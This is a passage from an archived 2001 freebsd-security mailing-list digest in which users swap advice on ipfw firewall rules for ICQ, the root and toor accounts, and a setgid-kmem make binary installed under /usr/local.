nikolaj@mail.spbnit.ru) Received: from 213.221.48.81 (ppp81-spb-213-221-48.sovintel.ru [213.221.48.81] (may be forged)) by neo.spbnit.ru (8.9.3+mPOP/8.9.3) with ESMTP id SAA36640 for ; Thu, 7 Jun 2001 18:00:00 +0400 (MSD) Date: Thu, 7 Jun 2001 18:00:37 +0400 From: "Nikolaj I. Potanin" X-Mailer: The Bat! (v1.51) Reply-To: "Nikolaj I. Potanin" Organization: Magistral Merkantil AB X-Priority: 3 (Normal) Message-ID: <1569370004.20010607180037@mail.spbnit.ru> To: freebsd-security@FreeBSD.ORG Subject: ipfw and icq In-Reply-To: <009e01c0ef55$da422340$9201a8c0@home.net> References: <009e01c0ef55$da422340$9201a8c0@home.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello to every GURU in this list! I'm a novice in this world :) and I have problem configuring firewall(ipfw) and icq on my FreeBSD4.2-box. I'm using a PPP connection to my ISP and therefore there are some differences in configuring ipfw (or not?). Everything works perfect, firewall filters all is has to, but I didn't manage to connect to my favorite icq.mirabilis.com:4000 %)I know that I should add something like $fwcmd add allow udp from any to any 4000 But it doesn't work! Here is my fwrules-file: fwcmd="/sbin/ipfw" $fwcmd -f flush $fwcmd add divert natd all from any to any via tun0 $fwcmd add allow ip from any to any via lo0 $fwcmd add allow tcp from any to any out xmit tun0 setup $fwcmd add allow tcp from any to any via tun0 established $fwcmd add allow tcp from any to any 80 setup $fwcmd add allow tcp from any to any 22 setup $fwcmd add reset log tcp from any to any 113 in recv tun0 $fwcmd add allow udp from any to MY_ISP'S_DNS_NUMBER 53 out xmit tun0 $fwcmd add allow udp from MY_ISP'S_DNS_NUMBER 53 to any in recv tun0 $fwcmd add 65435 allow icmp from any to any $fwcmd add 65435 deny log ip from any to any Maybe it's beacause of [options TCP_RESTRICT_RST] option added to my CUSTOM_KERNEL config file? Any ideas about this problem? Thanks in advance, == Nikolaj I. Potanin http://www.physto.se/~nikolaj UIN: 20582042 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 7:38: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id B2EB137B406 for ; Thu, 7 Jun 2001 07:37:53 -0700 (PDT) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1-AGK-0.5) with ESMTP id SAA73672; Thu, 7 Jun 2001 18:36:18 +0400 (MSD) Date: Thu, 7 Jun 2001 18:36:18 +0400 From: 3APA3A <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.51) Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU> Organization: http://www.security.nnov.ru X-Priority: 3 (Normal) Message-ID: <86117967378.20010607183618@SECURITY.NNOV.RU> To: "Nikolaj I. Potanin" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw and icq In-Reply-To: <1569370004.20010607180037@mail.spbnit.ru> References: <009e01c0ef55$da422340$9201a8c0@home.net> <1569370004.20010607180037@mail.spbnit.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello Nikolaj, You've allowed only outgoing traffic, but you also need to allow incoming one. Allowing UDP 4000 for all ports from whole Internet is huge security risk, you should limit port range and allowed network. In this case: allow udp from any 1024-65535 to 205.188.153.0/24 4000 allow udp from 205.188.153.0/24 4000 to any 1024-65535 This will work for ICQ up to 99 and licq/micq. Icq 2000 works different way - it uses TCP and first connects login.icq.com and then it's redirected to another server in the AOL Network. It's better to have incoming and outgoing lists for internal and external interface (and DMZ if you have one) in this case you can allow ICQ with something like: allow udp from any 1024-65535 to 205.188.153.0/24 4000 out via ext allow udp from 205.188.153.0/24 4000 to any 1024-65535 in via ext in this case you can also allow any outgoing TCP connections for ICQ 2000 to work: allow tcp from any 1024-65535,20 to any out via ext allow tcp from any to any 1024-65535,20 in via ext established For internal interface you can create list to only limit access to router itself. In any case in your configuration you will have problems with incoming direct connections with another ICQ users. You will be able only communicate via server (some unix ICQ clients always communicate via server), or connection may be established by your request if you allow outgoing TCP. If you use Windows ICQ client and you want to allow incoming direct connections (by request of your interlocutor) you can create port mappings of port ranges (approx. 50-70 ports for each host) and configure ICQ for each host to use external IP and this port range, or you can configure socks5 on your router. --Thursday, June 07, 2001, 6:00:37 PM, you wrote to freebsd-security@FreeBSD.ORG: NIP> Hello to every GURU in this list! NIP> I'm a novice in this world :) and I have problem configuring NIP> firewall(ipfw) and icq on my FreeBSD4.2-box. I'm using a PPP connection NIP> to my ISP and therefore there are some differences in configuring ipfw NIP> (or not?). Everything works perfect, firewall filters all is has to, but NIP> I didn't manage to connect to my favorite icq.mirabilis.com:4000 %)I NIP> know that I should add something like NIP> $fwcmd add allow udp from any to any 4000 NIP> But it doesn't work! NIP> Here is my fwrules-file: NIP> fwcmd="/sbin/ipfw" NIP> $fwcmd -f flush NIP> $fwcmd add divert natd all from any to any via tun0 NIP> $fwcmd add allow ip from any to any via lo0 NIP> $fwcmd add allow tcp from any to any out xmit tun0 setup NIP> $fwcmd add allow tcp from any to any via tun0 established NIP> $fwcmd add allow tcp from any to any 80 setup NIP> $fwcmd add allow tcp from any to any 22 setup NIP> $fwcmd add reset log tcp from any to any 113 in recv tun0 NIP> $fwcmd add allow udp from any to MY_ISP'S_DNS_NUMBER 53 out xmit tun0 NIP> $fwcmd add allow udp from MY_ISP'S_DNS_NUMBER 53 to any in recv tun0 NIP> $fwcmd add 65435 allow icmp from any to any NIP> $fwcmd add 65435 deny log ip from any to any NIP> Maybe it's beacause of [options TCP_RESTRICT_RST] option added to my NIP> CUSTOM_KERNEL config file? Any ideas about this problem? NIP> Thanks in advance, NIP> == NIP> Nikolaj I. Potanin NIP> http://www.physto.se/~nikolaj NIP> UIN: 20582042 NIP> To Unsubscribe: send mail to majordomo@FreeBSD.org NIP> with "unsubscribe freebsd-security" in the body of the message -- ~/3APA3A ðÏÑ×ÉÌÓÑ ÎÏ×ÙÊ ÔÉÐ ÜÌÅÍÅÎÔÁÒÎÙÈ ÞÁÓÔÉà - ÛË×ÁÒËÉ. îÅ ÏÞÅÎØ ÂÏÌØÛÉÅ, ÓÌÅÇËÁ ÐÏÄÇÏÒÅ×ÛÉÅ. (ìÅÍ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 7:58:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 5C6E537B403 for ; Thu, 7 Jun 2001 07:58:10 -0700 (PDT) (envelope-from fschapachnik@vianetworks.com.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id LAA15289; Thu, 7 Jun 2001 11:57:32 -0300 (ART) X-Authentication-Warning: ns1.via-net-works.net.ar: fpscha set sender to fschapachnik@vianetworks.com.ar using -f Date: Thu, 7 Jun 2001 11:57:32 -0300 From: "Fernando P . Schapachnik" To: "Nikolaj I. Potanin" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw and icq Message-ID: <20010607115732.A13665@ns1.via-net-works.net.ar> References: <009e01c0ef55$da422340$9201a8c0@home.net> <1569370004.20010607180037@mail.spbnit.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <1569370004.20010607180037@mail.spbnit.ru>; from nikolaj@mail.spbnit.ru on Thu, Jun 07, 2001 at 06:00:37PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org En un mensaje anterior, Nikolaj I. Potanin escribió: > Hello to every GURU in this list! > > I'm a novice in this world :) and I have problem configuring > firewall(ipfw) and icq on my FreeBSD4.2-box. I'm using a PPP connection > to my ISP and therefore there are some differences in configuring ipfw > (or not?). Everything works perfect, firewall filters all is has to, but > I didn't manage to connect to my favorite icq.mirabilis.com:4000 %)I > know that I should add something like You are better off using some SOCKS server like dante (in the ports) and configure your clients to use SOCKS 4. Good luck! Fernando P. Schapachnik Planificación de red y tecnología VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 7:59:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from neo.spbnit.ru (mail.spbnit.ru [212.48.192.115]) by hub.freebsd.org (Postfix) with ESMTP id 3290F37B401 for ; Thu, 7 Jun 2001 07:59:36 -0700 (PDT) (envelope-from nikolaj@mail.spbnit.ru) Received: from mail.spbnit.ru (ppp91-spb-213-221-48.sovintel.ru [213.221.48.91] (may be forged)) by neo.spbnit.ru (8.9.3+mPOP/8.9.3) with SMTP id SAA39155; Thu, 7 Jun 2001 18:59:29 +0400 (MSD) Date: Thu, 7 Jun 2001 19:00:13 +0400 From: "Nikolaj I. Potanin" To: "Laurynas Norvydas" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw and icq Message-Id: <20010607190013.4a57045e.nikolaj@mail.spbnit.ru> In-Reply-To: <0e4001c0ef5c$034299e0$241da8c0@ke.balt.net> References: <009e01c0ef55$da422340$9201a8c0@home.net> <1569370004.20010607180037@mail.spbnit.ru> <0e4001c0ef5c$034299e0$241da8c0@ke.balt.net> X-Mailer: stuphead version 0.4.9 (GTK+ 1.2.8; FreeBSD 4.2-RC1; i386) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ok, this worked for me also! Thank you so much and all athers that tried to help me! /Nikolaj LN> The connection has to go both ways: from you to ICQ server, and back, from ICQ server to you. So, LN> LN> ${fwcmd} add pass udp from 205.188.153.96:255.255.255.248 4000 to any LN> ${fwcmd} add pass udp from any to 205.188.153.96:255.255.255.248 4000 LN> LN> works for me :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8: 6:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from pkl.net (spoon.pkl.net [212.111.57.14]) by hub.freebsd.org (Postfix) with ESMTP id C770F37B406 for ; Thu, 7 Jun 2001 08:06:07 -0700 (PDT) (envelope-from rich@rdrose.org) Received: from localhost (rik@localhost) by pkl.net (8.9.3/8.9.3) with ESMTP id QAA01254 for ; Thu, 7 Jun 2001 16:06:02 +0100 Date: Thu, 7 Jun 2001 16:06:01 +0100 (BST) From: rich@rdrose.org X-Sender: rik@pkl.net To: freebsd-security@FreeBSD.ORG Subject: Re: root & toor In-Reply-To: <20010607100241.N30276-100000@axis.tdd.lt> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 7 Jun 2001, Domas Mituzas wrote: > toor has bourne shell, root has C shell. the only difference, afaik. Are *both* of these shells statically linked? Is toor's account disabled by default? Does toor own any files on the system, by default? rik To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:12:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr1.ericy.com (imr1.ericy.com [208.237.135.240]) by hub.freebsd.org (Postfix) with ESMTP id C0C3937B403 for ; Thu, 7 Jun 2001 08:12:21 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr5.exu.ericsson.se (mr5u3.ericy.com [208.237.135.124]) by imr1.ericy.com (8.11.3/8.11.3) with ESMTP id f57FCEa11337; Thu, 7 Jun 2001 10:12:14 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr5.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f57FCCH03455; Thu, 7 Jun 2001 10:12:12 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f57FCBG09316; Thu, 7 Jun 2001 11:12:11 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Thu, 7 Jun 2001 11:12:10 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id M3YLLDPR; Thu, 7 Jun 2001 11:12:01 -0400 From: "Antoine Beaupre (LMC)" To: rich@rdrose.org Cc: freebsd-security@FreeBSD.ORG Message-ID: <3B1F99C0.E0E7FEE8@lmc.ericsson.se> Date: Thu, 07 Jun 2001 11:12:00 -0400 Organization: LMC, Ericsson Research Canada X-Mailer: Mozilla 4.7 [en]C-CCK-MCD (WinNT; U) X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: root & toor References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org rich@rdrose.org wrote: > > On Thu, 7 Jun 2001, Domas Mituzas wrote: > > toor has bourne shell, root has C shell. the only difference, afaik. > > Are *both* of these shells statically linked? What does that mean? > Is toor's account disabled by default? On FreeBSD, by default: root::0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root: ie. root's account is null-passwd'd and toor account is de-activated. > Does toor own any files on the system, by default? Files are "owned" by uid. Since root and toor accounts share the same uid, toor owns basically the same files as root, even if ls and friends will show the files as owned by root probably because it's the first in the db (?). Basically, from what I understand, root and toor accounts are the same, apart from the shell. A. -- La sémantique est la gravité de l'abstraction. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:19: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id C5D2737B403 for ; Thu, 7 Jun 2001 08:18:55 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from ibmka (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with SMTP id TAA43258 for ; Thu, 7 Jun 2001 19:18:44 +0400 (MSD) Message-ID: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru> From: "Nickolay A. Kritsky" To: Subject: SGID make Date: Thu, 7 Jun 2001 19:18:42 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling huge C programs, isnt it? #ls -l /usr/local/bin/make -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make Thanks for any help. NKritsky - SysAdmin InternetHelp.Ru http://www.internethelp.ru e-mail: nkritsky@internethelp.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:23: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id D813837B406 for ; Thu, 7 Jun 2001 08:23:06 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1695 invoked by uid 1000); 7 Jun 2001 15:21:52 -0000 Date: Thu, 7 Jun 2001 18:21:52 +0300 From: Peter Pentchev To: rich@rdrose.org Cc: freebsd-security@FreeBSD.ORG Subject: Re: root & toor Message-ID: <20010607182152.B724@ringworld.oblivion.bg> Mail-Followup-To: rich@rdrose.org, freebsd-security@FreeBSD.ORG References: <20010607100241.N30276-100000@axis.tdd.lt> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rich@rdrose.org on Thu, Jun 07, 2001 at 04:06:01PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 04:06:01PM +0100, rich@rdrose.org wrote: > On Thu, 7 Jun 2001, Domas Mituzas wrote: > > toor has bourne shell, root has C shell. the only difference, afaik. > > Are *both* of these shells statically linked? Is toor's account disabled > by default? Does toor own any files on the system, by default? All login shells in the FreeBSD base system are statically linked - they are all placed in /bin, and everything in /bin and /sbin *must* be statically linked for obvious reasons (think NFS-mounted /usr). As others pointed out, yes, the toor account is disabled by default. and yes, toor owns all the root-owned files on the system :) G'luck, Peter -- If this sentence didn't exist, somebody would have invented it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:25: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 910DD37B407 for ; Thu, 7 Jun 2001 08:25:02 -0700 (PDT) (envelope-from fschapachnik@vianetworks.com.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id MAA32768; Thu, 7 Jun 2001 12:24:37 -0300 (ART) X-Authentication-Warning: ns1.via-net-works.net.ar: fpscha set sender to fschapachnik@vianetworks.com.ar using -f Date: Thu, 7 Jun 2001 12:24:37 -0300 From: "Fernando P . Schapachnik" To: "Nickolay A. Kritsky" Cc: security@FreeBSD.ORG Subject: Re: SGID make Message-ID: <20010607122437.A30591@ns1.via-net-works.net.ar> References: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 07:18:42PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org En un mensaje anterior, Nickolay A. Kritsky escribió: > Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling > huge C programs, isnt it? > > #ls -l /usr/local/bin/make > -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make If it lives in /usr/*local*/bin then it is a local adition, standard make is in /usr/bin/make. Regards! Fernando P. Schapachnik Planificación de red y tecnología VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:27:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 0B4F037B403 for ; Thu, 7 Jun 2001 08:27:36 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1788 invoked by uid 1000); 7 Jun 2001 15:26:22 -0000 Date: Thu, 7 Jun 2001 18:26:22 +0300 From: Peter Pentchev To: "Nickolay A. Kritsky" Cc: security@freebsd.org Subject: Re: SGID make Message-ID: <20010607182622.C724@ringworld.oblivion.bg> Mail-Followup-To: "Nickolay A. Kritsky" , security@freebsd.org References: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 07:18:42PM +0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 07:18:42PM +0400, Nickolay A. Kritsky wrote: > Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling > huge C programs, isnt it? > > #ls -l /usr/local/bin/make > -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make > > Thanks for any help. Are you sure nothing has been changed on your system? There's nothing in revision 1.13 of src/usr.bin/make/Makefile that should cause make(1) to be installed setgid kmem. G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:28:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 105B737B401 for ; Thu, 7 Jun 2001 08:28:33 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1810 invoked by uid 1000); 7 Jun 2001 15:27:19 -0000 Date: Thu, 7 Jun 2001 18:27:19 +0300 From: Peter Pentchev To: "Nickolay A. Kritsky" , security@freebsd.org Subject: Re: SGID make Message-ID: <20010607182719.D724@ringworld.oblivion.bg> Mail-Followup-To: "Nickolay A. Kritsky" , security@freebsd.org References: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru> <20010607182622.C724@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010607182622.C724@ringworld.oblivion.bg>; from roam@orbitel.bg on Thu, Jun 07, 2001 at 06:26:22PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 07, 2001 at 06:26:22PM +0300, Peter Pentchev wrote: > On Thu, Jun 07, 2001 at 07:18:42PM +0400, Nickolay A. Kritsky wrote: > > Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling > > huge C programs, isnt it? > > > > #ls -l /usr/local/bin/make > > -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make > > > > Thanks for any help. > > Are you sure nothing has been changed on your system? > There's nothing in revision 1.13 of src/usr.bin/make/Makefile that > should cause make(1) to be installed setgid kmem. Er whoops. Of course I should've noticed that this lives in /usr/local. Well, this is not FreeBSD 4.2's make(1). G'luck, Peter -- This would easier understand fewer had omitted. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 8:47:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from superconductor.rush.net (superconductor.rush.net [208.9.155.8]) by hub.freebsd.org (Postfix) with ESMTP id 28EC437B408 for ; Thu, 7 Jun 2001 08:47:23 -0700 (PDT) (envelope-from bright@superconductor.rush.net) Received: (from bright@localhost) by superconductor.rush.net (8.11.2/8.11.2) id f57FlG713299; Thu, 7 Jun 2001 11:47:16 -0400 (EDT) Date: Thu, 7 Jun 2001 11:47:15 -0400 From: Alfred Perlstein To: "Nickolay A. Kritsky" Cc: security@FreeBSD.ORG Subject: Re: SGID make Message-ID: <20010607114714.R1832@superconductor.rush.net> References: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0us In-Reply-To: <009501c0ef65$23482580$0600a8c0@ibmka.internethelp.ru>; from nkritsky@internethelp.ru on Thu, Jun 07, 2001 at 07:18:42PM +0400 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Nickolay A. Kritsky [010607 11:19] wrote: > Can anybody tell me why /usr/local/bin/make in FreeBSD 4.2 is SGID kmem? I thought that make is intended only for compiling > huge C programs, isnt it? > > #ls -l /usr/local/bin/make > -rwxr-sr-x 1 root kmem 445486 May 14 15:58 /usr/local/bin/make As people have stated this isn't our make, it's most likely GNU make installed without using the port. The reason for the sgid'ness is most likely so that the binary can query the system load average to optimize parrallel compliation without overwhelming the system. Although, this is sort of silly as the info should be available via sysctl in FreeBSD. -- -Alfred Perlstein [alfred@freebsd.org] Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9: 5:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail4.home.nl (mail4.home.nl [213.51.129.228]) by hub.freebsd.org (Postfix) with ESMTP id D1D0737B406 for ; Thu, 7 Jun 2001 09:05:06 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from windows ([213.51.193.168]) by mail4.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20010607160529.WLEW407.mail4.home.nl@windows> for ; Thu, 7 Jun 2001 17:05:29 +0100 Message-ID: <02ab01c0ef6b$b1002610$0900a8c0@windows> From: "Marcel Dijk" To: References: <009e01c0ef55$da422340$9201a8c0@home.net> <1569370004.20010607180037@mail.spbnit.ru><0e4001c0ef5c$034299e0$241da8c0@ke.balt.net> <20010607190013.4a57045e.nikolaj@mail.spbnit.ru> Subject: IPFW rules > ports still open! Date: Thu, 7 Jun 2001 18:05:37 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, i have tried to make a good firewall but I have some problems. This is my rc.firewall.rules file. add 500 allow all from 192.168.0.0/16 to any add 525 allow all from any to 192.168.0.0/16 #add 575 allow ip from any to MY_IP #add 600 allow ip from MY_IP to any add 615 allow tcp from any to MY_IP 22,5618,10000 add 625 allow tcp from MY_IP to any add 650 allow udp from any to MY_IP add 700 allow udp from MY_IP to any add 800 allow icmp from any to MY_IP add 750 allow icmp from MY_IP to any (MY_IP is my internet IP address. I have blocked it for abvious reasons) The problem is that I can't access the services that I have allowed. For example I can't access the service that's behind port 22 on MY_IP. Why is this? If I allow IP from any to MY_IP and allow ip from MY_IP to any all ports are open. And that;s just what I don't want. I hope you guys fill me and can help me. Thanks, I can't seem to solve this one. Marcel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 7 9:20:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from courier.netrail.net (courier.netrail.net [205.215.10.53]) by hub.freebsd.org (Postfix) with ESMTP id 65B2237B405 for ; Thu, 7 Jun 2001 09:20:10 -0700 (PDT) (envelope-from cschreiber@netrail.net) Received: by courier.netrail.net (Postfix, from userid 5408) id C90E9115; Thu, 7 Jun 2001 12:20:01 -0400 (EDT) Date: Thu, 7 Jun 2001 12:20:01 -0400 From: "Christian S ." To: Marcel Dijk Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW rules > ports still open! Message-ID: <20010607122001.B72448@netrail.net> References: <009e01c0ef55$da422340$9201a8c0@home.net> <1569370004.20010607180037@mail.spbnit.ru><0e4001c0ef5c$034299e0$241da8c0@ke.balt.net> <20010607190013.4a57045e.nikolaj@mail.spbnit.ru> <02ab01c0ef6b$b1002610$0900a8c0@windows> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <02ab01c0ef6b$b1002610$0900a8c0@windows>; from nascar24@home.nl on Thu, Jun 07, 2001 at 06:05:37PM +0200 Sender: 